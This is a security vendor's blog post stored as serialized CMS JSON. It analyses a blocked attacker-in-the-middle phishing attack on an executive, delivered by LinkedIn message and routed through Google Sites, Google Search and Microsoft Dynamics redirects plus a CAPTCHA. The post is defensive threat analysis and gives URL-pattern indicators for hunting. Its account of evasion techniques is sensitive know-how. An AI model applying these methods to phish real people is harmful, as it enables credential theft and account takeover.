value":20969,"marks":58827,"data":58828},[],{},{"nodeType":231,"data":58830,"content":58831},{},[],{"nodeType":169,"data":58833,"content":58834},{},[58835],{"nodeType":173,"value":20979,"marks":58836,"data":58838},[58837],{"type":370},{},{"nodeType":178,"data":58840,"content":58841},{},[58842,58845,58852],{"nodeType":173,"value":20987,"marks":58843,"data":58844},[],{},{"nodeType":186,"data":58846,"content":58847},{"uri":20992},[58848],{"nodeType":173,"value":20995,"marks":58849,"data":58851},[58850],{"type":194},{},{"nodeType":173,"value":21000,"marks":58853,"data":58854},[],{},{"nodeType":178,"data":58856,"content":58857},{},[58858],{"nodeType":173,"value":21007,"marks":58859,"data":58860},[],{},{"nodeType":178,"data":58862,"content":58863},{},[58864],{"nodeType":173,"value":21014,"marks":58865,"data":58866},[],{},{"nodeType":312,"data":58868,"content":58871},{"target":58869},{"sys":58870},{"id":21021,"type":317,"linkType":318},[],{"nodeType":231,"data":58873,"content":58874},{},[],{"nodeType":169,"data":58876,"content":58877},{},[58878],{"nodeType":173,"value":18605,"marks":58879,"data":58881},[58880],{"type":370},{},{"nodeType":178,"data":58883,"content":58884},{},[58885,58888,58895],{"nodeType":173,"value":21037,"marks":58886,"data":58887},[],{},{"nodeType":186,"data":58889,"content":58890},{"uri":21042},[58891],{"nodeType":173,"value":21045,"marks":58892,"data":58894},[58893],{"type":194},{},{"nodeType":173,"value":21050,"marks":58896,"data":58897},[],{},{"nodeType":178,"data":58899,"content":58900},{},[58901,58904,58911,58914,58921],{"nodeType":173,"value":1451,"marks":58902,"data":58903},[],{},{"nodeType":186,"data":58905,"content":58906},{"uri":1456},[58907],{"nodeType":173,"value":1459,"marks":58908,"data":58910},[58909],{"type":194},{},{"nodeType":173,"value":1464,"marks":58912,"data":58913},[],{},{"nodeType":186,"data":58915,"content":58916},{"uri":1469},[58917],{"nodeType":173,"value":1472,"marks":58918,"data":58920},[58919],{"type":194},{},{"nodeType":173,"value":1477,"marks":58922,"data":58923},[],{},{"nodeType":312,"data":58925,"content":58928},{"target":58926},{"sys":58927},{"id":20640,"type":317,"linkType":318},[],{"nodeType":178,"data":58930,"content":58931},{},[58932],{"nodeType":173,"value":37,"marks":58933,"data":58934},[],{},{"items":58936},[58937,58939],{"sys":58938,"name":509},{"id":508},{"sys":58940,"name":505},{"id":504},{"items":58942},[58943],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":58944},{"url":1496},{"__typename":1528,"sys":58946,"content":58947,"title":46288,"synopsis":59481,"hashTags":118,"publishedDate":59482,"slug":46289,"tagsCollection":59483,"authorsCollection":59489},{"id":24168},{"json":58948},{"nodeType":165,"data":58949,"content":58950},{},[58951,58957,58964,58971,58978,58981,58988,58995,59015,59021,59028,59034,59041,59048,59054,59070,59076,59083,59089,59092,59100,59107,59115,59134,59141,59148,59156,59175,59183,59202,59210,59229,59234,59237,59245,59252,59295,59302,59309,59312,59319,59326,59369,59372,59379,59386,59430,59457,59464],{"nodeType":312,"data":58952,"content":58956},{"target":58953},{"sys":58954},{"id":58955,"type":317,"linkType":318},"2pi21QGUvtdsDTbZYIF5Pr",[],{"nodeType":178,"data":58958,"content":58959},{},[58960],{"nodeType":173,"value":58961,"marks":58962,"data":58963},"Push recently detected and blocked a high-risk phishing attack targeting a company executive's Google Workspace account. ",[],{},{"nodeType":178,"data":58965,"content":58966},{},[58967],{"nodeType":173,"value":58968,"marks":58969,"data":58970},"This attack demonstrated a range of advanced detection evasion techniques designed to circumvent traditional detection controls. ",[],{},{"nodeType":178,"data":58972,"content":58973},{},[58974],{"nodeType":173,"value":58975,"marks":58976,"data":58977},"Given this was a highly targeted attack against a company executive, the impact of a successful phish would have been extremely high. Push’s browser-based detection and response solution intercepted and blocked the phish in real-time, preventing the Microsoft session or credentials being captured by the attacker.",[],{},{"nodeType":231,"data":58979,"content":58980},{},[],{"nodeType":169,"data":58982,"content":58983},{},[58984],{"nodeType":173,"value":24096,"marks":58985,"data":58987},[58986],{"type":370},{},{"nodeType":178,"data":58989,"content":58990},{},[58991],{"nodeType":173,"value":58992,"marks":58993,"data":58994},"A Push customer’s exec was targeted on LinkedIn via a direct message from another exec about an investment opportunity. The sender’s account had been compromised and used to approach high-value targets. ",[],{},{"nodeType":178,"data":58996,"content":58997},{},[58998,59002,59011],{"nodeType":173,"value":58999,"marks":59000,"data":59001},"The victim was sent a link to a basic page hosted on ",[],{},{"nodeType":186,"data":59003,"content":59005},{"uri":59004},"http://sites.google.com",[59006],{"nodeType":173,"value":59007,"marks":59008,"data":59010},"sites.google.com",[59009],{"type":194},{},{"nodeType":173,"value":59012,"marks":59013,"data":59014},", styled as a landing page for a private equity fund investment opportunity. The page had buttons to handle both Microsoft and Google users. ",[],{},{"nodeType":312,"data":59016,"content":59020},{"target":59017},{"sys":59018},{"id":59019,"type":317,"linkType":318},"1cEvEzLdKIuj6zuGn9aWJB",[],{"nodeType":178,"data":59022,"content":59023},{},[59024],{"nodeType":173,"value":59025,"marks":59026,"data":59027},"Upon clicking a button, Google Search was used as a redirect before taking the victim to a second page hosted on Microsoft Dynamics. This page was styled to look like Google Drive, where the victim was prompted to enter their last name and email into the form. ",[],{},{"nodeType":312,"data":59029,"content":59033},{"target":59030},{"sys":59031},{"id":59032,"type":317,"linkType":318},"4fJ3JUdGcuRTa2Nza9QhkU",[],{"nodeType":178,"data":59035,"content":59036},{},[59037],{"nodeType":173,"value":59038,"marks":59039,"data":59040},"Upon entering their details and clicking submit, the victim was finally sent to an  Attacker-in-the-Middle (AitM) phishing page. ",[],{},{"nodeType":178,"data":59042,"content":59043},{},[59044],{"nodeType":173,"value":59045,"marks":59046,"data":59047},"To access the page, the victim had to solve a custom CAPTCHA challenge, which we’ve observed in a number of recent phishing attacks that we’ve linked to the Tycoon 2FA phishing kit.  ",[],{},{"nodeType":312,"data":59049,"content":59053},{"target":59050},{"sys":59051},{"id":59052,"type":317,"linkType":318},"4Yu36QHTzSBZSg00QpbD1o",[],{"nodeType":178,"data":59055,"content":59056},{},[59057,59061,59066],{"nodeType":173,"value":59058,"marks":59059,"data":59060},"Because the customer had configured Push’s ",[],{},{"nodeType":173,"value":59062,"marks":59063,"data":59065},"phishing tool detection control",[59064],{"type":370},{},{"nodeType":173,"value":59067,"marks":59068,"data":59069}," in block mode, the Push browser agent flagged the page as malicious to the user and prevented the attack from continuing. ",[],{},{"nodeType":312,"data":59071,"content":59075},{"target":59072},{"sys":59073},{"id":59074,"type":317,"linkType":318},"6LfBXkDKqh1ogCMxaxyV6x",[],{"nodeType":178,"data":59077,"content":59078},{},[59079],{"nodeType":173,"value":59080,"marks":59081,"data":59082},"This detection was hooked by the customer’s security lake to trigger their security incident response workflow for further investigation. Push’s timelines feature ensured that the full chain of URLs accessed and actions performed on different pages could be analyzed by the security team. ",[],{},{"nodeType":312,"data":59084,"content":59088},{"target":59085},{"sys":59086},{"id":59087,"type":317,"linkType":318},"4S8J7zmi6Q5wOt9vQHUe6l",[],{"nodeType":231,"data":59090,"content":59091},{},[],{"nodeType":169,"data":59093,"content":59094},{},[59095],{"nodeType":173,"value":59096,"marks":59097,"data":59099},"Notable techniques",[59098],{"type":370},{},{"nodeType":178,"data":59101,"content":59102},{},[59103],{"nodeType":173,"value":59104,"marks":59105,"data":59106},"This attack featured a number of notable attacker techniques designed to evade common phishing detection controls. ",[],{},{"nodeType":235,"data":59108,"content":59109},{},[59110],{"nodeType":173,"value":59111,"marks":59112,"data":59114},"Delivering the phishing lure via LinkedIn",[59113],{"type":370},{},{"nodeType":178,"data":59116,"content":59117},{},[59118,59122,59130],{"nodeType":173,"value":59119,"marks":59120,"data":59121},"Using ",[],{},{"nodeType":186,"data":59123,"content":59124},{"uri":58195},[59125],{"nodeType":173,"value":59126,"marks":59127,"data":59129},"social media sites like LinkedIn",[59128],{"type":194},{},{"nodeType":173,"value":59131,"marks":59132,"data":59133}," to deliver a phishing message has a number of advantages for the attacker. Generally, users are less alert to phishing attempts on social platforms, particularly those like LinkedIn which are used for personal as well as work purposes. ",[],{},{"nodeType":178,"data":59135,"content":59136},{},[59137],{"nodeType":173,"value":59138,"marks":59139,"data":59140},"However, the primary benefit of delivering phishing over LinkedIn is to evade email-based detection controls. With modern email security tools conducting various stages of analysis, such as analysing the URL, attempting to inspect the page in a web sandbox, and analyzing the written content of an email for possible malicious intent, it can be easier for attackers to simply bypass email altogether. ",[],{},{"nodeType":178,"data":59142,"content":59143},{},[59144],{"nodeType":173,"value":59145,"marks":59146,"data":59147},"With modern work communications now happening over several platforms, sites like LinkedIn where users can be directly messaged by people outside the organization, but are often accessed from work devices, are a prime target. ",[],{},{"nodeType":235,"data":59149,"content":59150},{},[59151],{"nodeType":173,"value":59152,"marks":59153,"data":59155},"Using legitimate, trusted sites to host links",[59154],{"type":370},{},{"nodeType":178,"data":59157,"content":59158},{},[59159,59163,59171],{"nodeType":173,"value":59160,"marks":59161,"data":59162},"Attackers are increasingly ",[],{},{"nodeType":186,"data":59164,"content":59165},{"uri":58235},[59166],{"nodeType":173,"value":59167,"marks":59168,"data":59170},"using legitimate sites to host their phishing links",[59169],{"type":194},{},{"nodeType":173,"value":59172,"marks":59173,"data":59174}," and perform redirections. Fronting phishing attacks with pages hosted on legitimate sites, in combination with lengthy redirect chains, can make it harder for security tools which rely on analysing the initial page served to the victim. In this example, Google Sites, Google Search, and Microsoft Dynamics were used. ",[],{},{"nodeType":235,"data":59176,"content":59177},{},[59178],{"nodeType":173,"value":59179,"marks":59180,"data":59182},"Using bot protection to defeat sandbox analysis tools",[59181],{"type":370},{},{"nodeType":178,"data":59184,"content":59185},{},[59186,59190,59198],{"nodeType":173,"value":59187,"marks":59188,"data":59189},"Email and proxy security tools rely on loading a page in a web sandbox to analyze it for properties matching their detection signatures. However, dynamic elements that require user interaction to proceed are known to break these sandboxes. The most common way of attackers doing this is by ",[],{},{"nodeType":186,"data":59191,"content":59192},{"uri":50026},[59193],{"nodeType":173,"value":59194,"marks":59195,"data":59197},"using legitimate bot protection",[59196],{"type":194},{},{"nodeType":173,"value":59199,"marks":59200,"data":59201}," technologies such as CAPTCHA and CloudFlare Turnstile. ",[],{},{"nodeType":235,"data":59203,"content":59204},{},[59205],{"nodeType":173,"value":59206,"marks":59207,"data":59209},"Performing layered redirects at different stages",[59208],{"type":370},{},{"nodeType":178,"data":59211,"content":59212},{},[59213,59217,59225],{"nodeType":173,"value":59214,"marks":59215,"data":59216},"As already mentioned, the ",[],{},{"nodeType":186,"data":59218,"content":59219},{"uri":8419},[59220],{"nodeType":173,"value":59221,"marks":59222,"data":59224},"chain of redirects",[59223],{"type":194},{},{"nodeType":173,"value":59226,"marks":59227,"data":59228}," across different sites was particularly notable in this case (you can see this in the timeline screenshot provided above). To maximize the lifespan of a malicious domain, attackers are known to use various redirection tricks (often though legit sites that are often excluded from scanning tools). Using several redirections before serving the malicious page to break referrer-based checks that are common in proxy solutions and prevent the initial URLs seeded out from being discovered. By obfuscating the initial URL delivered to victims, and both masking and rotating the phishing URLs, it is much harder for organizations to blocklist known-bad sites effectively.",[],{},{"nodeType":312,"data":59230,"content":59233},{"target":59231},{"sys":59232},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":59235,"content":59236},{},[],{"nodeType":169,"data":59238,"content":59239},{},[59240],{"nodeType":173,"value":59241,"marks":59242,"data":59244},"Indicators of Compromise",[59243],{"type":370},{},{"nodeType":178,"data":59246,"content":59247},{},[59248],{"nodeType":173,"value":59249,"marks":59250,"data":59251},"Static IoCs are of limited value in this case due to the use of disposable pages designed to be used once and then rotated. In this case, the page hosting the malicious AITM kit has now been flagged by Google after being reported. This makes blocking specific malicious subdomains hosted on otherwise legitimate sites difficult. However, we have observed a consistent pattern in the attacks identified by Push:",[],{},{"nodeType":250,"data":59253,"content":59254},{},[59255,59265,59275,59285],{"nodeType":254,"data":59256,"content":59257},{},[59258],{"nodeType":178,"data":59259,"content":59260},{},[59261],{"nodeType":173,"value":59262,"marks":59263,"data":59264},"Phishing lure delivered over LinkedIn",[],{},{"nodeType":254,"data":59266,"content":59267},{},[59268],{"nodeType":178,"data":59269,"content":59270},{},[59271],{"nodeType":173,"value":59272,"marks":59273,"data":59274},"Link to sites.google.com page (e.g. sites.google.com/view/\u003CINVESTMENTCOMPANY>-ai/home)",[],{},{"nodeType":254,"data":59276,"content":59277},{},[59278],{"nodeType":178,"data":59279,"content":59280},{},[59281],{"nodeType":173,"value":59282,"marks":59283,"data":59284},"Link to Microsoft Dynamics page (e.g. [assets-usa.mkt].dynamics.com/...)",[],{},{"nodeType":254,"data":59286,"content":59287},{},[59288],{"nodeType":178,"data":59289,"content":59290},{},[59291],{"nodeType":173,"value":59292,"marks":59293,"data":59294},"Link to (*).sa.com phishing page",[],{},{"nodeType":178,"data":59296,"content":59297},{},[59298],{"nodeType":173,"value":59299,"marks":59300,"data":59301},"Given the targeted nature of the attack, we recommend hunting for executive-level users accessing some combination of these URLs (and variants) in a short timespan.",[],{},{"nodeType":178,"data":59303,"content":59304},{},[59305],{"nodeType":173,"value":59306,"marks":59307,"data":59308},"We also recommend informing your executive team about the rise in LinkedIn phishing attacks and the specific nature of the investment opportunity lure.",[],{},{"nodeType":231,"data":59310,"content":59311},{},[],{"nodeType":169,"data":59313,"content":59314},{},[59315],{"nodeType":173,"value":8967,"marks":59316,"data":59318},[59317],{"type":370},{},{"nodeType":178,"data":59320,"content":59321},{},[59322],{"nodeType":173,"value":59323,"marks":59324,"data":59325},"There aren’t many more valuable accounts than those belonging to your company executives. Compromising a Google Workspace account doesn’t just give the attacker access to the Workspace tenant, emails, chat, etc. — it also grants access to any accounts on downstream apps configured for SSO. The blast radius of such a compromise is pretty widespread, giving plenty of scope for further exploitation for an attacker with a clear idea of what they want to achieve. ",[],{},{"nodeType":178,"data":59327,"content":59328},{},[59329,59333,59342,59345,59354,59358,59365],{"nodeType":173,"value":59330,"marks":59331,"data":59332},"In short, stopping this attack at the earliest opportunity was a significant benefit. Even if the attack had been later stopped following the compromise and the stolen account reset, unpicking the web of potentially compromised downstream accounts that may have been accessed and backdoored by the attacker (such as by configuring stealthy persistence mechanisms like ",[],{},{"nodeType":186,"data":59334,"content":59336},{"uri":59335},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/evil_twin_integrations/description.md",[59337],{"nodeType":173,"value":59338,"marks":59339,"data":59341},"evil twin integrations",[59340],{"type":194},{},{"nodeType":173,"value":2936,"marks":59343,"data":59344},[],{},{"nodeType":186,"data":59346,"content":59348},{"uri":59347},"https://github.com/pushsecurity/saas-attacks/blob/main/techniques/api_keys/description.md",[59349],{"nodeType":173,"value":59350,"marks":59351,"data":59353},"API keys",[59352],{"type":194},{},{"nodeType":173,"value":59355,"marks":59356,"data":59357}," or other ",[],{},{"nodeType":186,"data":59359,"content":59360},{"uri":832},[59361],{"nodeType":173,"value":4519,"marks":59362,"data":59364},[59363],{"type":194},{},{"nodeType":173,"value":59366,"marks":59367,"data":59368}," methods) presents a sizable overhead for the security team.     ",[],{},{"nodeType":231,"data":59370,"content":59371},{},[],{"nodeType":169,"data":59373,"content":59374},{},[59375],{"nodeType":173,"value":2824,"marks":59376,"data":59378},[59377],{"type":370},{},{"nodeType":178,"data":59380,"content":59381},{},[59382],{"nodeType":173,"value":59383,"marks":59384,"data":59385},"Two key features played a part in this detection, which you can read more about below:",[],{},{"nodeType":250,"data":59387,"content":59388},{},[59389,59409],{"nodeType":254,"data":59390,"content":59391},{},[59392],{"nodeType":178,"data":59393,"content":59394},{},[59395,59398,59406],{"nodeType":173,"value":37,"marks":59396,"data":59397},[],{},{"nodeType":186,"data":59399,"content":59400},{"uri":9120},[59401],{"nodeType":173,"value":59402,"marks":59403,"data":59405},"Phishing attack detection",[59404],{"type":194},{},{"nodeType":173,"value":37,"marks":59407,"data":59408},[],{},{"nodeType":254,"data":59410,"content":59411},{},[59412],{"nodeType":178,"data":59413,"content":59414},{},[59415,59418,59427],{"nodeType":173,"value":37,"marks":59416,"data":59417},[],{},{"nodeType":186,"data":59419,"content":59421},{"uri":59420},"https://pushsecurity.com/blog/introducing-push-detections/",[59422],{"nodeType":173,"value":59423,"marks":59424,"data":59426},"Push detection and response capabilities inc. timeline visibility ",[59425],{"type":194},{},{"nodeType":173,"value":37,"marks":59428,"data":59429},[],{},{"nodeType":178,"data":59431,"content":59432},{},[59433,59437,59442,59446,59453],{"nodeType":173,"value":59434,"marks":59435,"data":59436},"Push doesn’t detect the redirect tricks or rely on outdated domain TI feeds. The reason we detect these attacks (which make it through all the other layers of phishing protection) is that ",[],{},{"nodeType":173,"value":59438,"marks":59439,"data":59441},"Push sees what your users see",[59440],{"type":370},{},{"nodeType":173,"value":59443,"marks":59444,"data":59445},". It doesn’t matter what ",[],{},{"nodeType":186,"data":59447,"content":59448},{"uri":6820},[59449],{"nodeType":173,"value":8545,"marks":59450,"data":59452},[59451],{"type":194},{},{"nodeType":173,"value":59454,"marks":59455,"data":59456},", Push detects and blocks attacks by identifying the attack in real time, as the user loads the page in their web browser.",[],{},{"nodeType":178,"data":59458,"content":59459},{},[59460],{"nodeType":173,"value":59461,"marks":59462,"data":59463},"This isn’t all we do: Push’s browser-based security platform provides comprehensive detection and response capabilities against the leading cause of breaches. Push blocks browser-based attacks like AiTM phishing, credential stuffing, password spraying and session hijacking using stolen session tokens. You don’t need to wait until it all goes wrong — you can also use Push to find and fix vulnerabilities across the apps that your employees use, like ghost logins, SSO coverage gaps, MFA gaps, vulnerable passwords, risky OAuth integrations, and more to harden your identity attack surface.",[],{},{"nodeType":178,"data":59465,"content":59466},{},[59467,59471,59478],{"nodeType":173,"value":59468,"marks":59469,"data":59470},"If you want to learn more about how Push helps you to detect and stop attacks in the browser, ",[],{},{"nodeType":186,"data":59472,"content":59473},{"uri":473},[59474],{"nodeType":173,"value":1472,"marks":59475,"data":59477},[59476],{"type":194},{},{"nodeType":173,"value":1477,"marks":59479,"data":59480},[],{},"How Push saved a company exec from a sophisticated Attacker-in-the-Middle phishing attack delivered via a LinkedIn direct message.","2025-09-08T00:00:00.000Z",{"items":59484},[59485,59487],{"sys":59486,"name":509},{"id":508},{"sys":59488,"name":505},{"id":504},{"items":59490},[59491],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":59492},{"url":1496},{"items":59494},[59495],{"fullName":1493,"firstName":3975,"jobTitle":1494,"profilePicture":59496},{"url":1496},{"json":59498,"links":59968},{"nodeType":165,"data":59499,"content":59500},{},[59501,59507,59513,59539,59545,59551,59557,59560,59567,59583,59589,59594,59600,59605,59611,59616,59622,59627,59633,59638,59644,59650,59655,59658,59665,59681,59687,59693,59698,59714,59721,59737,59744,59760,59766,59771,59797,59804,59830,59837,59853,59858,59861,59868,59884,59889,59892,59899,59905,59911,59914,59921,59927,59933,59957,59962],{"nodeType":178,"data":59502,"content":59503},{},[59504],{"nodeType":173,"value":49766,"marks":59505,"data":59506},[],{},{"nodeType":178,"data":59508,"content":59509},{},[59510],{"nodeType":173,"value":39774,"marks":59511,"data":59512},[],{},{"nodeType":178,"data":59514,"content":59515},{},[59516,59519,59526,59529,59536],{"nodeType":173,"value":39781,"marks":59517,"data":59518},[],{},{"nodeType":186,"data":59520,"content":59521},{"uri":49783},[59522],{"nodeType":173,"value":39789,"marks":59523,"data":59525},[59524],{"type":194},{},{"nodeType":173,"value":9534,"marks":59527,"data":59528},[],{},{"nodeType":186,"data":59530,"content":59531},{"uri":6820},[59532],{"nodeType":173,"value":8157,"marks":59533,"data":59535},[59534],{"type":194},{},{"nodeType":173,"value":49800,"marks":59537,"data":59538},[],{},{"nodeType":178,"data":59540,"content":59541},{},[59542],{"nodeType":173,"value":49807,"marks":59543,"data":59544},[],{},{"nodeType":178,"data":59546,"content":59547},{},[59548],{"nodeType":173,"value":49814,"marks":59549,"data":59550},[],{},{"nodeType":178,"data":59552,"content":59553},{},[59554],{"nodeType":173,"value":49821,"marks":59555,"data":59556},[],{},{"nodeType":231,"data":59558,"content":59559},{},[],{"nodeType":169,"data":59561,"content":59562},{},[59563],{"nodeType":173,"value":49831,"marks":59564,"data":59566},[59565],{"type":370},{},{"nodeType":178,"data":59568,"content":59569},{},[59570,59573,59580],{"nodeType":173,"value":49839,"marks":59571,"data":59572},[],{},{"nodeType":186,"data":59574,"content":59575},{"uri":49844},[59576],{"nodeType":173,"value":49847,"marks":59577,"data":59579},[59578],{"type":194},{},{"nodeType":173,"value":49852,"marks":59581,"data":59582},[],{},{"nodeType":178,"data":59584,"content":59585},{},[59586],{"nodeType":173,"value":49859,"marks":59587,"data":59588},[],{},{"nodeType":312,"data":59590,"content":59593},{"target":59591},{"sys":59592},{"id":49866,"type":317,"linkType":318},[],{"nodeType":178,"data":59595,"content":59596},{},[59597],{"nodeType":173,"value":49872,"marks":59598,"data":59599},[],{},{"nodeType":312,"data":59601,"content":59604},{"target":59602},{"sys":59603},{"id":49879,"type":317,"linkType":318},[],{"nodeType":178,"data":59606,"content":59607},{},[59608],{"nodeType":173,"value":49885,"marks":59609,"data":59610},[],{},{"nodeType":312,"data":59612,"content":59615},{"target":59613},{"sys":59614},{"id":49892,"type":317,"linkType":318},[],{"nodeType":178,"data":59617,"content":59618},{},[59619],{"nodeType":173,"value":49898,"marks":59620,"data":59621},[],{},{"nodeType":312,"data":59623,"content":59626},{"target":59624},{"sys":59625},{"id":49905,"type":317,"linkType":318},[],{"nodeType":178,"data":59628,"content":59629},{},[59630],{"nodeType":173,"value":49911,"marks":59631,"data":59632},[],{},{"nodeType":312,"data":59634,"content":59637},{"target":59635},{"sys":59636},{"id":49918,"type":317,"linkType":318},[],{"nodeType":178,"data":59639,"content":59640},{},[59641],{"nodeType":173,"value":49924,"marks":59642,"data":59643},[],{},{"nodeType":178,"data":59645,"content":59646},{},[59647],{"nodeType":173,"value":49931,"marks":59648,"data":59649},[],{},{"nodeType":312,"data":59651,"content":59654},{"target":59652},{"sys":59653},{"id":49938,"type":317,"linkType":318},[],{"nodeType":231,"data":59656,"content":59657},{},[],{"nodeType":169,"data":59659,"content":59660},{},[59661],{"nodeType":173,"value":49947,"marks":59662,"data":59664},[59663],{"type":370},{},{"nodeType":178,"data":59666,"content":59667},{},[59668,59671,59678],{"nodeType":173,"value":49955,"marks":59669,"data":59670},[],{},{"nodeType":186,"data":59672,"content":59673},{"uri":49960},[59674],{"nodeType":173,"value":49963,"marks":59675,"data":59677},[59676],{"type":194},{},{"nodeType":173,"value":49968,"marks":59679,"data":59680},[],{},{"nodeType":178,"data":59682,"content":59683},{},[59684],{"nodeType":173,"value":49975,"marks":59685,"data":59686},[],{},{"nodeType":178,"data":59688,"content":59689},{},[59690],{"nodeType":173,"value":49982,"marks":59691,"data":59692},[],{},{"nodeType":312,"data":59694,"content":59697},{"target":59695},{"sys":59696},{"id":49989,"type":317,"linkType":318},[],{"nodeType":178,"data":59699,"content":59700},{},[59701,59704,59711],{"nodeType":173,"value":49995,"marks":59702,"data":59703},[],{},{"nodeType":186,"data":59705,"content":59706},{"uri":6820},[59707],{"nodeType":173,"value":8157,"marks":59708,"data":59710},[59709],{"type":194},{},{"nodeType":173,"value":50006,"marks":59712,"data":59713},[],{},{"nodeType":235,"data":59715,"content":59716},{},[59717],{"nodeType":173,"value":50013,"marks":59718,"data":59720},[59719],{"type":370},{},{"nodeType":178,"data":59722,"content":59723},{},[59724,59727,59734],{"nodeType":173,"value":50021,"marks":59725,"data":59726},[],{},{"nodeType":186,"data":59728,"content":59729},{"uri":50026},[59730],{"nodeType":173,"value":50029,"marks":59731,"data":59733},[59732],{"type":194},{},{"nodeType":173,"value":50034,"marks":59735,"data":59736},[],{},{"nodeType":235,"data":59738,"content":59739},{},[59740],{"nodeType":173,"value":50041,"marks":59741,"data":59743},[59742],{"type":370},{},{"nodeType":178,"data":59745,"content":59746},{},[59747,59750,59757],{"nodeType":173,"value":37,"marks":59748,"data":59749},[],{},{"nodeType":186,"data":59751,"content":59752},{"uri":7853},[59753],{"nodeType":173,"value":50055,"marks":59754,"data":59756},[59755],{"type":194},{},{"nodeType":173,"value":50060,"marks":59758,"data":59759},[],{},{"nodeType":178,"data":59761,"content":59762},{},[59763],{"nodeType":173,"value":50067,"marks":59764,"data":59765},[],{},{"nodeType":312,"data":59767,"content":59770},{"target":59768},{"sys":59769},{"id":50074,"type":317,"linkType":318},[],{"nodeType":178,"data":59772,"content":59773},{},[59774,59777,59784,59787,59794],{"nodeType":173,"value":50080,"marks":59775,"data":59776},[],{},{"nodeType":186,"data":59778,"content":59779},{"uri":42062},[59780],{"nodeType":173,"value":50087,"marks":59781,"data":59783},[59782],{"type":194},{},{"nodeType":173,"value":50092,"marks":59785,"data":59786},[],{},{"nodeType":186,"data":59788,"content":59789},{"uri":50097},[59790],{"nodeType":173,"value":50100,"marks":59791,"data":59793},[59792],{"type":194},{},{"nodeType":173,"value":50105,"marks":59795,"data":59796},[],{},{"nodeType":235,"data":59798,"content":59799},{},[59800],{"nodeType":173,"value":50112,"marks":59801,"data":59803},[59802],{"type":370},{},{"nodeType":178,"data":59805,"content":59806},{},[59807,59810,59817,59820,59827],{"nodeType":173,"value":50120,"marks":59808,"data":59809},[],{},{"nodeType":186,"data":59811,"content":59812},{"uri":50125},[59813],{"nodeType":173,"value":50128,"marks":59814,"data":59816},[59815],{"type":194},{},{"nodeType":173,"value":50133,"marks":59818,"data":59819},[],{},{"nodeType":186,"data":59821,"content":59822},{"uri":50138},[59823],{"nodeType":173,"value":50141,"marks":59824,"data":59826},[59825],{"type":194},{},{"nodeType":173,"value":50146,"marks":59828,"data":59829},[],{},{"nodeType":235,"data":59831,"content":59832},{},[59833],{"nodeType":173,"value":50153,"marks":59834,"data":59836},[59835],{"type":370},{},{"nodeType":178,"data":59838,"content":59839},{},[59840,59843,59850],{"nodeType":173,"value":50161,"marks":59841,"data":59842},[],{},{"nodeType":186,"data":59844,"content":59845},{"uri":50166},[59846],{"nodeType":173,"value":50169,"marks":59847,"data":59849},[59848],{"type":194},{},{"nodeType":173,"value":50174,"marks":59851,"data":59852},[],{},{"nodeType":312,"data":59854,"content":59857},{"target":59855},{"sys":59856},{"id":8590,"type":317,"linkType":318},[],{"nodeType":231,"data":59859,"content":59860},{},[],{"nodeType":169,"data":59862,"content":59863},{},[59864],{"nodeType":173,"value":50189,"marks":59865,"data":59867},[59866],{"type":370},{},{"nodeType":178,"data":59869,"content":59870},{},[59871,59874,59881],{"nodeType":173,"value":50197,"marks":59872,"data":59873},[],{},{"nodeType":186,"data":59875,"content":59876},{"uri":50202},[59877],{"nodeType":173,"value":50205,"marks":59878,"data":59880},[59879],{"type":194},{},{"nodeType":173,"value":50210,"marks":59882,"data":59883},[],{},{"nodeType":312,"data":59885,"content":59888},{"target":59886},{"sys":59887},{"id":50217,"type":317,"linkType":318},[],{"nodeType":231,"data":59890,"content":59891},{},[],{"nodeType":169,"data":59893,"content":59894},{},[59895],{"nodeType":173,"value":40632,"marks":59896,"data":59898},[59897],{"type":370},{},{"nodeType":178,"data":59900,"content":59901},{},[59902],{"nodeType":173,"value":50233,"marks":59903,"data":59904},[],{},{"nodeType":178,"data":59906,"content":59907},{},[59908],{"nodeType":173,"value":50240,"marks":59909,"data":59910},[],{},{"nodeType":231,"data":59912,"content":59913},{},[],{"nodeType":169,"data":59915,"content":59916},{},[59917],{"nodeType":173,"value":1422,"marks":59918,"data":59920},[59919],{"type":370},{},{"nodeType":178,"data":59922,"content":59923},{},[59924],{"nodeType":173,"value":42238,"marks":59925,"data":59926},[],{},{"nodeType":178,"data":59928,"content":59929},{},[59930],{"nodeType":173,"value":50263,"marks":59931,"data":59932},[],{},{"nodeType":178,"data":59934,"content":59935},{},[59936,59939,59945,59948,59954],{"nodeType":173,"value":1451,"marks":59937,"data":59938},[],{},{"nodeType":186,"data":59940,"content":59941},{"uri":1456},[59942],{"nodeType":173,"value":1459,"marks":59943,"data":59944},[],{},{"nodeType":173,"value":1464,"marks":59946,"data":59947},[],{},{"nodeType":186,"data":59949,"content":59950},{"uri":1469},[59951],{"nodeType":173,"value":1472,"marks":59952,"data":59953},[],{},{"nodeType":173,"value":1477,"marks":59955,"data":59956},[],{},{"nodeType":312,"data":59958,"content":59961},{"target":59959},{"sys":59960},{"id":8590,"type":317,"linkType":318},[],{"nodeType":178,"data":59963,"content":59964},{},[59965],{"nodeType":173,"value":37,"marks":59966,"data":59967},[],{},{"entries":59969},{"hyperlink":59970,"inline":59971,"block":59972},[],[],[59973,59977,59982,59987,59992,59998,60005,60011,60017,60019],{"sys":59974,"__typename":5434,"title":59975,"arcadeDemoUrl":59976,"playText":5437},{"id":49866},"Sneaky2FA demo narrated","https://demo.arcade.software/jkU39x4sItKUREwWf711?embed",{"sys":59978,"__typename":5345,"title":59979,"caption":59979,"layoutMode":118,"file":59980},{"id":49879},"The user must pass a bot protection check to load the phishing page. ",{"url":59981,"width":5358,"height":11979},"https://images.ctfassets.net/y1cdw1ablpvd/OLp2M4pKuurBpsQSBsl5T/82476532de81fcfb7e6fd7cf4352e4b8/image6.png",{"sys":59983,"__typename":5345,"title":59984,"caption":59984,"layoutMode":118,"file":59985},{"id":49892},"The user is prompted to “Sign in with Microsoft” as part of the phishing lure.",{"url":59986,"width":5358,"height":11979},"https://images.ctfassets.net/y1cdw1ablpvd/26RGH5UdNEN2n6duJ8o8I0/cbdf729ef6f18c7452638fe58ab62d2b/image5.png",{"sys":59988,"__typename":5345,"title":59989,"caption":59989,"layoutMode":118,"file":59990},{"id":49905},"An embedded browser pop-up contains the phishing 